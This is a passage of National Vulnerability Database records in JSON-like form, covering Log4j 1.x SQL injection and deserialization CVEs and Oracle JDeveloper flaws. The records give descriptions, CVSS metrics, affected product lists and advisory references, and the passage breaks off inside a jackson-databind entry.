This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "Por diseño, el JDBCAppender en Log4j versiones 1.2.x, acepta una sentencia SQL como parámetro de configuración donde los valores a insertar son convertidores de PatternLayout. Es probable que el convertidor de mensajes, %m, sea incluido siempre. Esto permite a atacantes manipular el SQL introduciendo cadenas diseñadas en los campos de entrada o en los encabezados de una aplicación que son registradas permitiendo una ejecución de consultas SQL no deseadas. Tenga en cuenta que este problema sólo afecta a Log4j versiones 1.x cuando es configurado específicamente para usar el JDBCAppender, que no es el predeterminado. A partir de la versión 2.0-beta8, fue reintroducido el JDBCAppender con soporte apropiado para consultas SQL parametrizadas y mayor personalización sobre las columnas escritas en los registros. Apache Log4j versiones 1.2 llegó al final de su vida útil en agosto de 2015. 
Los usuarios deberían actualizar a Log4j 2, ya que aborda numerosos problemas de las versiones anteriores", }, ], id: "CVE-2022-23305", lastModified: "2024-11-21T06:48:22.517", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 6.8, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-01-18T16:15:08.350", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { source: "security@apache.org", tags: [ "Issue Tracking", "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", 
"Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-89", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-89", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 11.1.1.7.0 | |
oracle | jdeveloper | 11.1.1.9.0 | |
oracle | jdeveloper | 11.1.2.4.0 | |
oracle | jdeveloper | 12.1.3.0.0 | |
oracle | jdeveloper | 12.2.1.0.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "204CEEBC-3D7C-483D-99D6-264EEFAE968C", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, and 12.2.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to ADF Faces.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y 12.2.1.0.0 permite a atacantes remotos afectar la confidencialidad, la integridad y la disponibilidad a través de vectores relacionados con ADF Faces.", }, ], id: "CVE-2016-3504", lastModified: "2025-04-12T10:46:40.837", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: 
"nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2016-07-21T10:12:57.557", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/91787", }, { source: "secalert_us@oracle.com", url: "http://www.securityfocus.com/bid/92023", }, { source: "secalert_us@oracle.com", url: "http://www.securitytracker.com/id/1036370", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/91787", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securityfocus.com/bid/92023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id/1036370", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 11.1.1.7.0 | |
oracle | jdeveloper | 11.1.1.9.0 | |
oracle | jdeveloper | 11.1.2.4.0 | |
oracle | jdeveloper | 12.1.3.0.0 | |
oracle | jdeveloper | 12.2.1.0.0 | |
oracle | jdeveloper | 12.2.1.1.0 | |
oracle | jdeveloper | 12.2.1.2.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "204CEEBC-3D7C-483D-99D6-264EEFAE968C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.1.0:*:*:*:*:*:*:*", matchCriteriaId: "0061C130-67E8-45CD-8463-15D6661419AD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", matchCriteriaId: "739DC3EA-E25A-449B-8468-9A65AECC47C4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: ADF Faces). 
Versiones compatibles que están afectadas son 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 y 12.2.1.2.0. Vulnerabilidad fácilmente explotable permite a atacantes no autenticados con acceso a la red a través de HTTP, comprometer Oracle JDeveloper. Mientras la vulnerabilidad esté en Oracle JDeveloper, los ataques podrían afectar significativamente a productos adicionales. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle JDeveloper. CVSS v3.0 Base Score 5.8 (Impactos de Confidencialidad).", }, ], id: "CVE-2017-3255", lastModified: "2025-04-20T01:37:25.860", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 5.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 1.4, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2017-01-27T22:59:02.757", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/95543", 
}, { source: "secalert_us@oracle.com", url: "http://www.securitytracker.com/id/1037631", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/95543", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id/1037631", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "CWE-200", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Source | URL | Tags | |
---|---|---|---|
security@apache.org | https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | Mailing List, Vendor Advisory | |
security@apache.org | https://logging.apache.org/log4j/1.2/index.html | Vendor Advisory | |
security@apache.org | https://www.oracle.com/security-alerts/cpuapr2022.html | Patch, Third Party Advisory | |
security@apache.org | https://www.oracle.com/security-alerts/cpujul2022.html | Patch, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | Mailing List, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://logging.apache.org/log4j/1.2/index.html | Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpuapr2022.html | Patch, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpujul2022.html | Patch, Third Party Advisory |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:chainsaw:*:*:*:*:*:*:*:*", matchCriteriaId: "4A0D9BED-411E-4E62-A281-237D3C90FFEB", versionEndExcluding: "2.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "56EF3EFE-3632-4CDD-90EF-D2E614E05886", versionEndExcluding: "2.0", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "EB681829-2B2A-4BDB-8DC5-B3C7D359F4C5", versionEndExcluding: "1.2.18.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: 
"C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: 
"6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, { lang: "es", value: "CVE-2020-9493 identificó un problema de deserialización presente en Apache Chainsaw. 
Versiones anteriores a Chainsaw V2.0 Chainsaw era un componente de Apache Log4j versiones 1.2.x donde se presenta el mismo problema", }, ], id: "CVE-2022-23307", lastModified: "2024-11-21T06:48:22.733", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "COMPLETE", baseScore: 9, confidentialityImpact: "COMPLETE", integrityImpact: "COMPLETE", vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C", version: "2.0", }, exploitabilityScore: 8, impactScore: 10, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2022-01-18T16:15:08.403", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Vendor Advisory", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "A1BA8F04-46A7-4804-A997-59080034013F", versionEndExcluding: "2.6.7.2", versionStartIncluding: "2.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc1:*:*:*:*:*:*", matchCriteriaId: "C43DF125-AD83-4402-BF82-72542F898D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc2:*:*:*:*:*:*", matchCriteriaId: "E2DD9CB6-7456-417A-A816-32BD8EC5FA83", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc3:*:*:*:*:*:*", matchCriteriaId: "80428392-1050-4980-BF13-49CE32F96478", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc1:*:*:*:*:*:*", matchCriteriaId: "ADA0D863-2917-4E7B-8FF6-B499180D2D4C", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc2:*:*:*:*:*:*", matchCriteriaId: "ED1E9904-73E0-45F3-86A9-6173EE67E74D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr1:*:*:*:*:*:*", matchCriteriaId: "B1618FF9-0FDC-44BA-9FDA-5EA843C0D2D5", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr2:*:*:*:*:*:*", matchCriteriaId: "3FEDB0BC-FE4C-4851-A142-96767E337898", vulnerable: true, }, { criteria: 
